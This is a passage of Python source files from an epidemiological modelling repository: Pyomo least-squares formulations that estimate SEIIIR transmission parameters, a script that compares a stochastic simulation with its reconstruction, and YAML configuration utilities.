The model is written in terms of absolute\n numbers of cases (not ln-transform). The model combines estimates across\n multiple time series, one for each node.\n\n Parameters\n ----------\n\n cumulative_reported_cases : a dataframe of *new* cases reported in\n each time period; each column in the dataframe is a separate time\n series\n population : a dataframe with a single column that represents the\n population for different columns in cumulative_reported_cases\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma : float\n the rate constant for leaving the I compartment. This will be multiplied\n by 3 when applied to each of the three I compartments\n deltaP : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n\n \"\"\"\n model = pe.ConcreteModel()\n\n # Cached data\n model.sigma = sigma\n model.gamma_1 = gamma_1\n model.gamma_2 = gamma_2\n model.gamma_3 = gamma_3\n model.deltaP = deltaP\n model.reporting_factor = reporting_factor\n\n #\n # NOTE: Here we assume that all time series have the same length\n #\n numcases = cumulative_reported_cases.shape[0]\n model.TIMES_beta = pe.Set(initialize=[i for i in range((numcases-1+6)//7)], ordered=True)\n model.beta_offset = 7*((numcases-1+6)//7) - numcases + 1\n model.beta = pe.Var(model.TIMES_beta, initialize=1.3, bounds=(0,None)) # transmission parameter\n ## IS THIS AN ERROR?\n ##model.alpha = pe.Var(initialize=1.0)\n ##model.alpha.fix(1.0)\n\n counter = [0]*((numcases-1+6)//7)\n #print(\"len(cases)\", len(cumulative_reported_cases['12121']))\n #print(\"len(cases)\", len(cumulative_reported_cases['12121'].to_list()))\n #print(\"cases\", cumulative_reported_cases['12121'].to_list())\n #print(\"HERE\", numcases, 7*((numcases+6)//7), model.beta_offset)\n #model.TIMES_beta.pprint()\n #print(counter)\n\n #model.A = pe.Set(initialize=[v for v in cumulative_reported_cases.keys().to_list()])\n model.A = pe.Set(initialize=list(range(len(cumulative_reported_cases.keys()))))\n\n def block_rule(B, nodeid):\n # Cached data\n B.N = population.iloc[nodeid] # overall population\n reported_cases = [v[0] for v in cumulative_reported_cases.iloc[:, [nodeid] ].values]\n\n cases, S, E, I1, I2, I3, R = compute_compartments_decay(cumulative_reported_cases=reported_cases,\n population=B.N,\n sigma=sigma,\n gamma_1=gamma_1, gamma_2=gamma_2, gamma_3=gamma_3,\n deltaP=deltaP, reporting_factor=reporting_factor)\n assert(len(cases) == len(reported_cases))\n\n if verbose:\n print('corrected case data being used:')\n print(cases)\n\n # define the set of times\n B.timesteps = [i for i in range(len(cases))]\n B.TIMES = pe.Set(initialize=B.timesteps, ordered=True)\n B.TIMES_m_one = pe.Set(initialize=B.timesteps[1:], ordered=True)\n\n #print(\"id\", nodeid)\n #print(\"LEN(CASES)\", len(cases))\n #print(\"cases\", cases)\n #print(\"TIMES\")\n #B.TIMES.pprint()\n\n # define the case count variables\n B.Chat = pe.Var(B.TIMES_m_one, initialize=1.0)\n\n # infection process\n def _infection_process(b, t):\n if t == b.TIMES.last():\n return pe.Constraint.Skip\n counter[(t+model.beta_offset)//7] = counter[(t+model.beta_offset)//7] + 1\n return b.Chat[t+1] == model.beta[(t+model.beta_offset)//7] * (I1[t] + I2[t] + I3[t]) * S[t] / b.N\n B.infection_process = pe.Constraint(B.TIMES, rule=_infection_process)\n\n # least squares objective function\n def _lse(b):\n return sum( (b.Chat[t] - cases[t])**2 for t in b.TIMES_m_one)\n B.lse = pe.Expression(rule=_lse)\n\n model.b = pe.Block(model.A, rule=block_rule)\n\n def _total_lse(m):\n return sum( m.b[a].lse for a in m.A )\n model.total_lse = pe.Objective(rule=_total_lse)\n\n ## likelihood objective function\n #def _like(m):\n # #return sum( cases[t]/model.N*pe.log(1-pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / model.N)) for t in model.TIMES_m_one if I1[t-1] + I2[t-1] + I3[t-1] > 0) + \\\n # # sum( (S[t]-cases[t])/model.N*pe.log(pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / model.N)) for t in model.TIMES_m_one)\n # return sum( cases[t]/model.N*pe.log(1-pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / model.N)) for t in model.TIMES_m_one if I1[t] + I2[t] + I3[t] > 0) + \\\n # sum( (S[t]-cases[t])/model.N*pe.log(pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / model.N)) for t in model.TIMES_m_one)\n #model.like = pe.Objective(rule=_like, sense=pe.maximize)\n #model.like.deactivate()\n\n if verbose:\n print(\"counter\",counter)\n\n return model\n\n" }, { "alpha_fraction": 0.5727733373641968, "alphanum_fraction": 0.5899106860160828, "avg_line_length": 42.40559387207031, "blob_id": "327ea7126e8ce6835feee2e182358937591b3e3b", "content_id": "57c2e52bd48c6f30e7188abebe036b0f493cdf76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12429, "license_type": "no_license", "max_line_length": 130, "num_lines": 286, "path": "/epi_inference/evaluation/reconstruction/single-simulation/reconstruction_steps_per_day.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport os\nfrom datetime import datetime\nfrom epi_inference.reconstruction.common import reported_cases_from_cumulative\nfrom epi_inference.reconstruction.stochastic import stochastic_reconstruction\nfrom epi_inference.reconstruction.deterministic import reconstruct_states_deterministic_decay\nfrom epi_inference.simulation.simulation import simulate_discrete_seiiir_stochastic\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\n\"\"\"\nThis module runs reconstructions on data from a stochastic simulation\nand produces some figures showing the results.\n\"\"\"\n\ndef compare_simulation_and_reconstruction(tf, fname):\n output_path = os.path.dirname(fname)\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n N=100000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5.2\n gamma = 1/4.3\n beta = 2.2*gamma\n rho = 10\n report_delay = 8\n tx = [0]*tf\n tx[30] = 1\n\n sim = simulate_discrete_seiiir_stochastic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n\n dfsim_S = pd.DataFrame({'dates': sim.SEIIIR.dates, 'values':sim.SEIIIR.S}).set_index('dates')\n dfsim_T = pd.DataFrame({'dates': sim.SEIIIR.dates, 'values':sim.SEIIIR.transmissions}).set_index('dates')\n dfsim_E = pd.DataFrame({'dates': sim.SEIIIR.dates, 'values':sim.SEIIIR.E}).set_index('dates')\n dfsim_I1 = pd.DataFrame({'dates': sim.SEIIIR.dates, 'values':sim.SEIIIR.I1}).set_index('dates')\n dfsim_I2 = pd.DataFrame({'dates': sim.SEIIIR.dates, 'values':sim.SEIIIR.I2}).set_index('dates')\n dfsim_I3 = pd.DataFrame({'dates': sim.SEIIIR.dates, 'values':sim.SEIIIR.I3}).set_index('dates')\n dfsim_R = pd.DataFrame({'dates': sim.SEIIIR.dates, 'values':sim.SEIIIR.R}).set_index('dates')\n\n Ccases = np.round(sim.cumulative_reported_cases.values).astype(int)\n Cdates = sim.cumulative_reported_cases.dates\n\n dfstoch_S = None\n dfstoch_T = None\n dfstoch_E = None\n dfstoch_I1 = None\n dfstoch_I2 = None\n dfstoch_I3 = None\n dfstoch_R = None\n bunch_reported_cases_per_day = reported_cases_from_cumulative(dates=Cdates,\n cumulative_reported_cases=Ccases)\n for real in range(100):\n bunch_recon = stochastic_reconstruction(\n dates=bunch_reported_cases_per_day.dates,\n reported_cases_per_day=bunch_reported_cases_per_day.values,\n population=N,\n n_steps_per_day=1,\n reporting_delay_mean=8,\n reporting_delay_dev=1.35,\n reporting_multiplier=10,\n fixed_incubation=5.2,\n infectious_lower=2.6,\n infectious_upper=6.0,\n )\n\n if dfstoch_S is None:\n dates = bunch_recon.dates\n dfstoch_S = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_T = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_E = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_I1 = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_I2 = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_I3 = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_R = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n \n dfstoch_S['{}'.format(real)] = bunch_recon.S\n dfstoch_T['{}'.format(real)] = bunch_recon.transmissions\n dfstoch_E['{}'.format(real)] = bunch_recon.E\n dfstoch_I1['{}'.format(real)] = bunch_recon.I1\n dfstoch_I2['{}'.format(real)] = bunch_recon.I2\n dfstoch_I3['{}'.format(real)] = bunch_recon.I3\n dfstoch_R['{}'.format(real)] = bunch_recon.R\n\n # do a deterministic reconstruction\n det_recon = reconstruct_states_deterministic_decay(\n dates=bunch_reported_cases_per_day.dates,\n reported_cases_per_day=bunch_reported_cases_per_day.values,\n population=N,\n sigma=1/5.2,\n gamma=1/4.3,\n reporting_factor=10,\n report_delay=8\n )\n\n with PdfPages(fname) as pdf:\n ax = dfstoch_S.plot(color='silver', legend=False)\n dfsim_S[dfsim_S.index.isin(dfstoch_S.index)].plot(ax=ax, color='black', legend='Simulated S')\n detdf = pd.DataFrame({'dates': pd.to_datetime(det_recon.dates), 'det_recon_S':det_recon.S}).set_index('dates')\n detdf[detdf.index.isin(dfstoch_S.index)].plot(ax=ax, color='red', legend='det_recon')\n plt.title('S comparison')\n pdf.savefig()\n plt.close()\n\n ax = dfstoch_T.plot(color='silver', legend=False)\n dfsim_T[dfsim_T.index.isin(dfstoch_T.index)].plot(ax=ax, color='black', legend='Simulated T')\n detdf = pd.DataFrame({'dates': pd.to_datetime(det_recon.dates), 'det_recon_T':det_recon.transmissions}).set_index('dates')\n detdf[detdf.index.isin(dfstoch_S.index)].plot(ax=ax, color='red', legend='det_recon')\n plt.title('Comparison of daily transmissions')\n pdf.savefig()\n plt.close()\n \n ax = dfstoch_E.plot(color='silver', legend=False)\n dfsim_E[dfsim_E.index.isin(dfstoch_E.index)].plot(ax=ax, color='black', legend='Simulated E')\n detdf = pd.DataFrame({'dates': pd.to_datetime(det_recon.dates), 'det_recon_E':det_recon.E}).set_index('dates')\n detdf[detdf.index.isin(dfstoch_S.index)].plot(ax=ax, color='red', legend='det_recon')\n plt.title('E comparison')\n pdf.savefig()\n plt.close()\n\n ax = dfstoch_I1.plot(color='silver', legend=False)\n dfsim_I1[dfsim_I1.index.isin(dfstoch_I1.index)].plot(ax=ax, color='black', legend='Simulated I1')\n detdf = pd.DataFrame({'dates': pd.to_datetime(det_recon.dates), 'det_recon_I1':det_recon.I1}).set_index('dates')\n detdf[detdf.index.isin(dfstoch_S.index)].plot(ax=ax, color='red', legend='det_recon')\n plt.title('I1 comparison')\n pdf.savefig()\n plt.close()\n \n ax = dfstoch_I2.plot(color='silver', legend=False)\n dfsim_I2[dfsim_I2.index.isin(dfstoch_I2.index)].plot(ax=ax, color='black', legend='Simulated I2')\n detdf = pd.DataFrame({'dates': pd.to_datetime(det_recon.dates), 'det_recon_I2':det_recon.I2}).set_index('dates')\n detdf[detdf.index.isin(dfstoch_S.index)].plot(ax=ax, color='red', legend='det_recon')\n plt.title('I2 comparison')\n pdf.savefig()\n plt.close()\n \n ax = dfstoch_I3.plot(color='silver', legend=False)\n dfsim_I3[dfsim_I3.index.isin(dfstoch_I3.index)].plot(ax=ax, color='black', legend='Simulated I3')\n detdf = pd.DataFrame({'dates': pd.to_datetime(det_recon.dates), 'det_recon_I3':det_recon.I3}).set_index('dates')\n detdf[detdf.index.isin(dfstoch_S.index)].plot(ax=ax, color='red', legend='det_recon')\n plt.title('I3 comparison')\n pdf.savefig()\n plt.close()\n\n ax = dfstoch_R.plot(color='silver', legend=False)\n dfsim_R[dfsim_R.index.isin(dfstoch_R.index)].plot(ax=ax, color='black', legend='Simulated I3')\n detdf = pd.DataFrame({'dates': pd.to_datetime(det_recon.dates), 'det_recon_R':det_recon.R}).set_index('dates')\n detdf[detdf.index.isin(dfstoch_S.index)].plot(ax=ax, color='red', legend='det_recon')\n plt.title('R comparison')\n pdf.savefig()\n plt.close()\n\n\n dfsim_R = dfsim_R[:dfstoch_R.index[-1]].astype(float)\n dfstoch_R = dfstoch_R[dfsim_R.index[0]:]\n dferr_R = dfstoch_R.subtract(dfsim_R['values'], axis=0)\n ax = dferr_R.mean(axis=1).plot(color='silver', legend=False)\n print(dferr_R.mean(axis=1))\n plt.title('R Errors')\n pdf.savefig()\n plt.close()\n\n #ax = dfstoch_T.cumsum().plot(color='silver', legend=False)\n #dfsim_R.plot(ax=ax, color='black', legend='Simulated R')\n #plt.title('R comparison')\n #pdf.savefig()\n #plt.close()\n\n return\n\ndef generate_reconstruction_figures(Cdates, Ccases, fname, comment):\n output_path = os.path.dirname(fname)\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n dfstoch_S = None\n dfstoch_T = None\n dfstoch_E = None\n dfstoch_I1 = None\n dfstoch_I2 = None\n dfstoch_I3 = None\n dfstoch_R = None\n for real in range(100):\n rdates, reported_cases_per_day = reported_cases_from_cumulative(Cdates, Ccases)\n dates, T, S, E, I1, I2, I3, R = stochastic_reconstruction(rdates, reported_cases_per_day, N, 1)\n\n if dfstoch_S is None:\n dfstoch_S = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_T = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_E = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_I1 = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_I2 = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_I3 = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_R = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n \n dfstoch_S['{}'.format(real)] = S\n dfstoch_T['{}'.format(real)] = T\n dfstoch_E['{}'.format(real)] = E\n dfstoch_I1['{}'.format(real)] = I1\n dfstoch_I2['{}'.format(real)] = I2\n dfstoch_I3['{}'.format(real)] = I3\n dfstoch_R['{}'.format(real)] = R\n\n with PdfPages(fname) as pdf:\n ax = dfstoch_S.plot(color='silver', legend=False)\n plt.title('S {}'.format(comment))\n pdf.savefig()\n plt.close()\n\n ax = dfstoch_T.plot(color='silver', legend=False)\n plt.title('daily transmissions {}'.format(comment))\n pdf.savefig()\n plt.close()\n \n ax = dfstoch_E.plot(color='silver', legend=False)\n plt.title('E {}'.format(comment))\n pdf.savefig()\n plt.close()\n\n ax = dfstoch_I1.plot(color='silver', legend=False)\n plt.title('I1 {}'.format(comment))\n pdf.savefig()\n plt.close()\n \n ax = dfstoch_I2.plot(color='silver', legend=False)\n plt.title('I2 {}'.format(comment))\n pdf.savefig()\n plt.close()\n \n ax = dfstoch_I3.plot(color='silver', legend=False)\n plt.title('I3 {}'.format(comment))\n pdf.savefig()\n plt.close()\n\n ax = dfstoch_R.plot(color='silver', legend=False)\n plt.title('R {}'.format(comment))\n pdf.savefig()\n plt.close()\n\n\"\"\"\ndef compare_stepsize_and_not_stepsize_reconstruction(tf):\n N=100000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5.2\n gamma = 1/4.3\n beta = 2.2*gamma\n rho = 10\n report_delay = 8\n tx = [0]*tf\n tx[30] = 1\n\n Cdates,Ccases,dates,T,S,E,I1,I2,I3,R = \\\n simulate_discrete_seiiir_stochastic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n\n np.random.seed(42)\n rdates, rcases, dates, T, S, E, I1, I2, I3, R = stochastic_reconstruction(Cdates, Ccases, N, 1)\n np.random.seed(42)\n rdatesb, rcasesb, datesb, Tb, Sb, Eb, I1b, I2b, I3b, Rb = stochastic_reconstruction(Cdates, Ccases, N)\n\n for i,v in enumerate(rcases):\n assert rdates[i] == rdatesb[i]\n assert abs(v - rcasesb[i]) <= 1e-10\n\n for i in range(len(dates)):\n assert dates[i] == datesb[i]\n assert abs(T[i] - Tb[i]) <= 1e-10\n assert abs(S[i] - Sb[i]) <= 1e-10\n assert abs(E[i] - Eb[i]) <= 1e-10\n assert abs(I1[i] - I1b[i]) <= 1e-10\n assert abs(I2[i] - I2b[i]) <= 1e-10\n assert abs(I3[i] - I3b[i]) <= 1e-10\n assert abs(R[i] - Rb[i]) <= 1e-10\n\"\"\"\n\nif __name__ == '__main__':\n np.random.seed(1975)\n # compare_stepsize_and_not_stepsize_reconstruction(tf=60)\n compare_simulation_and_reconstruction(120, './figures/reconstruction-steps_per_day.pdf')\n \n\n \n" }, { "alpha_fraction": 0.6332955956459045, "alphanum_fraction": 0.6417326927185059, "avg_line_length": 39.831932067871094, "blob_id": "600389427316a3259e162e005033f03cb67d6353", "content_id": "22e9e870b687e8fe37a572da4ee2a9847da1687e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9719, "license_type": "no_license", "max_line_length": 228, "num_lines": 238, "path": "/epi_inference/formulations/attic/multibeta_singeomegawin_wc_decay_lsq.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pyomo.environ as pe\nfrom pyomo.environ import SolverFactory, value\nfrom pyomo.opt import check_optimal_termination\nimport pandas as pd\nfrom datetime import datetime\nfrom . import reconstruction as recon\n\ndef run_multibeta_singleomegawin_decay_lsq(cm_rep_cases, populations, sigma, gamma, report_delay, reporting_factor, analysis_window, verbose=False):\n \"\"\"\n This function solves the least-squares inference inference formulation\n using the decay-based reconstruction function. \n\n Each county has a separate beta value, but a common set of omega\n multipliers.\n\n Parameters\n ----------\n\n cm_rep_cases : a dataframe of *new* cases reported in\n each time period; each column in the dataframe is a separate time\n series\n populations : a dataframe with a single column that represents the\n population for different columns in cm_rep_cases\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma : float\n the rate constant for leaving the I compartment. This will be multiplied\n by 3 when applied to each of the three I compartments\n report_delay : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n verbose : bool\n If true, then more output is printed to the console when the analysis is run\n \"\"\"\n # check the inputs\n assert sigma > 0\n assert gamma > 0\n assert report_delay > 0\n assert (populations > 0).all().all() == True\n assert reporting_factor >= 1\n\n # ToDo: this needs to be passed in - for now create a default set of dates\n ##Cdates = pd.date_range(end=datetime(year=2020, month=4, day=12), periods=len(cm_rep_cases)).to_pydatetime().tolist()\n\n # create the Pyomo optimization formulation\n m = create_inference_formulation_multibeta_singleomegawin_decay_lsq(\n Cdates=Cdates,\n cumulative_reported_cases=cm_rep_cases,\n populations=populations,\n sigma=sigma,\n gamma_1=gamma*3,\n gamma_2=gamma*3,\n gamma_3=gamma*3,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=analysis_window,\n verbose=verbose\n)\n\n # call the solver\n verbose=True\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(m, tee=verbose)\n\n m.pprint()\n m.display()\n\n est_beta = {}\n est_omega = {}\n\n # Check that the solve completed successfully\n if check_optimal_termination(status) == False:\n return {'est_beta': est_beta, 'est_omega': est_omega, 'status': 'failed', 'msg': 'Unknown solver error.'}\n\n for o in m.omega.values():\n if o.value == True:\n return {'est_beta': est_beta, 'est_omega': est_omega, 'status': 'failed', 'msg': 'Transmission parameter scaling value omega not solved (stale).'}\n # check that the beta value was successfully solved\n for i in m.b:\n if m.b[i].beta.value == True:\n return {'est_beta': est_beta, 'est_omega': est_omega, 'status': 'failed', 'msg': 'Transmission parameter beta not solved (stale).'}\n\n for i in m.A:\n #print(\"BETA\", populations.index[i], value(m.b[i].beta))\n if not m.b[i].beta.stale:\n est_beta[ populations.index[i] ] = value(m.b[i].beta)\n\n cm_rep_cases_node = [v[0] for v in cm_rep_cases.iloc[:, [0] ].values]\n\n rdates, rcases, dates, T, S, E, I1, I2, I3, R = \\\n recon.reconstruct_states_deterministic_decay(\n Cdates=Cdates,\n cumulative_reported_cases=cm_rep_cases_node,\n population=populations.iloc[0],\n sigma=sigma,\n gamma=gamma/3,\n reporting_factor=reporting_factor,\n report_delay=report_delay\n )\n for j, o in m.omega.items():\n #print(\"OMEGA\", Cdates[j], dates[j], value(m.omega[j]))\n if not o.stale:\n est_omega[ dates[j] ] = value(o)\n\n return {'est_beta': est_beta, 'est_omega':est_omega, 'status': 'ok', 'msg': 'Optimal solution found'}\n\ndef create_inference_formulation_multibeta_singleomegawin_decay_lsq(Cdates, cumulative_reported_cases, populations, sigma, gamma_1, gamma_2, gamma_3, report_delay, reporting_factor, analysis_window, loglsq=False, verbose=False):\n \"\"\"\n Creates a one-step-ahead inference model using a decay\n model with 3 I compartments. The model is written in terms of absolute\n numbers of cases (not ln-transform). \n\n The model combines computes a different beta value for each time series, using a common set of \n omega factors to describe the changes in beta over time for all counties.\n\n Parameters\n ----------\n Cdates: list of datetime objects\n The list of datetime objects that correspond to the dates for the\n cumulative_reported_cases\n cumulative_reported_cases : a dataframe of *new* cases reported in\n each time period; each column in the dataframe is a separate time\n series\n populations : a dataframe with a single column that represents the\n population for different columns in cumulative_reported_cases\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma_1 : float\n the rate constant for leaving the I1 compartment.\n gamma_2 : float\n the rate constant for leaving the I2 compartment.\n gamma_3 : float\n the rate constant for leaving the I3 compartment.\n report_delay : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n\n \"\"\"\n #if len(analysis_window) != 0:\n # raise NotImplementedError('analysis_window is not yet implemented for multibeta_singleomega_decay_lsq')\n window = int(analysis_window.get('days',1))\n assert(window >= 1)\n\n model = pe.ConcreteModel()\n\n # Cached data\n model.sigma = sigma\n model.gamma_1 = gamma_1\n model.gamma_2 = gamma_2\n model.gamma_3 = gamma_3\n model.report_delay = report_delay\n model.reporting_factor = reporting_factor\n\n #\n # We assume that all counties have the same number of time steps\n #\n # TODO: This should be checked in inference.py\n #\n model.timesteps = [i for i in range(len(Cdates)-1)]\n model.TIMES = pe.Set(initialize=model.timesteps, ordered=True)\n\n model.omega_timesteps = [i+window-1 for i in range(len(Cdates)-window)]\n model.omega = pe.Var(model.omega_timesteps, initialize=1.3, bounds=(0,1)) # transmission parameter\n\n model.A = pe.Set(initialize=list(range(len(cumulative_reported_cases.keys()))))\n\n def block_rule(B, nodeid):\n # Cached data\n B.N = float(populations.iloc[nodeid]) # overall population\n\n cm_rep_cases_node = [v[0] for v in cumulative_reported_cases.iloc[:, [nodeid] ].values]\n\n rdates, rcases, dates, T, S, E, I1, I2, I3, R = \\\n recon.reconstruct_states_deterministic_decay(\n Cdates=Cdates,\n cumulative_reported_cases=cm_rep_cases_node,\n population=B.N,\n sigma=sigma,\n gamma=gamma_1/3,\n reporting_factor=reporting_factor,\n report_delay=report_delay\n )\n\n if verbose: # pragma: no cover\n print('corrected case data being used:')\n print(T)\n\n # Q: Is there a better way to do this?\n TIMES = model.TIMES\n\n # transmission parameter\n B.beta = pe.Var(initialize=1.3, bounds=(0,None))\n # the case count variables\n B.T_hat = pe.Var(TIMES, initialize=1.0)\n\n # infection process\n #def _infection_process(b, t):\n # return b.T_hat[t] == B.beta * model.omega[t] * (I1[t] + I2[t] + I3[t]) * S[t] / b.N\n #B.infection_process = pe.Constraint(TIMES, rule=_infection_process)\n\n B.infection_process = pe.ConstraintList()\n for t in model.omega_timesteps:\n for offset in range(window):\n tau = t-offset\n rhscoef = (I1[tau] + I2[tau] + I3[tau]) * S[tau] / B.N \n if rhscoef > 0:\n B.infection_process.add( B.T_hat[tau] >= B.beta * model.omega[t] * rhscoef - T[t])\n B.infection_process.add( B.T_hat[tau] >= T[t] - B.beta * model.omega[t] * rhscoef)\n\n # least squares objective function\n def _lse(b):\n return sum( b.T_hat[t]**2 for t in TIMES)\n B.lse = pe.Expression(rule=_lse)\n\n model.b = pe.Block(model.A, rule=block_rule)\n\n def _total_lse(m):\n return sum( m.b[a].lse for a in m.A )\n model.total_lse = pe.Objective(rule=_total_lse)\n\n return model\n\n" }, { "alpha_fraction": 0.4928637146949768, "alphanum_fraction": 0.49516573548316956, "avg_line_length": 33.19684982299805, "blob_id": "0ebd44de7ea82f611359d0e1d4f84c5a09f0149c", "content_id": "aa7f8108164b91bcc2a5d8542904a0c90f6fcebf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4344, "license_type": "no_license", "max_line_length": 127, "num_lines": 127, "path": "/epi_inference/engine/util.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['factorial_iterator', 'load_configfile']\n\nimport sys\nimport itertools\nimport string\nimport yaml\nfrom pyutilib.misc import Options\n\nfrom .config_parameters import get_config_parameters, set_config_parameters\n\n\ndef _safe_eval(value, levels):\n tmp = string.Template(value).safe_substitute(**levels)\n try:\n return int(tmp)\n except:\n try:\n return float(tmp)\n except:\n pass\n return tmp\n\ndef _eval(value, levels, other_values):\n tmp = string.Template(value).safe_substitute(**levels)\n tmp = string.Template(tmp).substitute(**other_values)\n try:\n return int(tmp)\n except:\n try:\n return float(tmp)\n except:\n pass\n return tmp\n\n\ndef factorial_iterator(factors, config, other_values={}):\n assert(config.get('factor_levels',None) is None)\n\n factor_names = list(sorted(factors.keys()))\n factor_list = list(factors[f] for f in factor_names)\n for fac_ in itertools.product(*factor_list):\n levels = {}\n CONFIG = Options()\n for i in range(len(fac_)):\n levels[factor_names[i]] = str(fac_[i])\n #CONFIG[factor_names[i]] = fac_[i]\n for key, value in config.items():\n if type(value) is str and '${' in value:\n CONFIG[key] = _eval(value, levels, other_values)\n elif type(value) is dict:\n CONFIG[key] = Options()\n for _key, _value in value.items():\n if type(_value) is str and '${' in _value:\n CONFIG[key][_key] = _eval(_value, levels, other_values)\n else:\n CONFIG[key][_key] = _value\n else:\n CONFIG[key] = value\n\n CONFIG.factors = None\n CONFIG.factor_levels = levels\n #\n # Yield a tuple with a modified configuration object\n #\n yield CONFIG\n\n\ndef yaml_parser__load_yaml_data(loader, node):\n value = loader.construct_scalar(node)\n value = string.Template(value).substitute(**get_config_parameters())\n with open(value, 'r') as INPUT:\n return yaml.load(INPUT, Loader=yaml.Loader)\n\n\ndef load_configfile(config_file):\n yaml.add_constructor(u'!LoadYAMLFile', yaml_parser__load_yaml_data)\n set_config_parameters({})\n\n with open(config_file, 'r') as INPUT:\n try:\n first = True\n configs = []\n for config in yaml.load_all(INPUT, Loader=yaml.Loader):\n if first:\n first = False\n for key in config:\n if type(config[key]) in [list, dict]:\n configs.append(config)\n break\n if len(configs) == 1:\n continue\n #\n # It looks like this is a config block\n # process is *now*, before the workflow block\n # is processed.\n #\n # NOTE: This iterates at most 10 times trying to\n # replace strings, and then gives up.\n #\n parameters = config\n counter=10\n while counter > 0:\n flag=True\n tmp = {}\n for key,value in parameters.items():\n if type(value) is str and '${' in value:\n tmp[key] = _safe_eval(value, parameters)\n flag = False\n else:\n tmp[key] = value\n parameters = tmp\n if flag:\n break\n counter = counter - 1\n set_config_parameters(parameters)\n else:\n configs.append(config)\n except yaml.YAMLError as exc: # pragma: nocover\n print(\"ERROR: problem parsing YAML file '%s'\" % config_file)\n print(exc)\n sys.exit(1)\n #\n # Error checks\n #\n if len(configs) != 1:\n raise RuntimeError(\"Problem loading configuration file. Can only process a YAML file with one or two YAML documents.\")\n return configs[0]\n\n" }, { "alpha_fraction": 0.530515193939209, "alphanum_fraction": 0.5360634326934814, "avg_line_length": 32.486724853515625, "blob_id": "2826077b01a67aa3fb2f5ec2129f164205ec9306", "content_id": "8da338c8a7a47cf0cd3bf843fd4599b7696f8263", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3785, "license_type": "no_license", "max_line_length": 138, "num_lines": 113, "path": "/epi_inference/reconstruction/recon_summary_wf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['recon_summary']\n\nimport sys\nimport os.path\ntry:\n import ujson as json\nexcept:\n import json\nimport glob\nimport numpy as np\nfrom pyutilib.misc import timing\n\nfrom ..engine.task import Task\nfrom ..engine.task_registry import register_task\nfrom ..engine.misc import save_metadata\n\n\ndef summary_narrow(OUTPUT, input_json_files, scenario_index, counties):\n counties = set(counties)\n first = True\n series = ['transmissions', 'S', 'E', 'I1', 'I2', 'I3', 'R', 'orig_rep_cases']\n values = []\n data = {}\n\n for filename in glob.glob(input_json_files):\n if not os.path.exists(filename):\n raise RuntimeError(\"ERROR: Reconstruction JSON file does not exist: \"+ filename)\n #\n with open(filename,'r') as INPUT:\n raw = json.load(INPUT)\n if first:\n #\n # Process the first JSON file\n #\n if len(counties) == 0:\n counties = list(sorted(raw.keys()))\n for fips in raw:\n curr = raw[fips]\n if 'E' not in curr:\n continue\n for key in sorted(curr.keys()):\n if key in series or key in values or key == 'dates':\n continue\n elif key != \"FIPS\":\n values.append( key )\n break\n #\n values.remove(scenario_index)\n 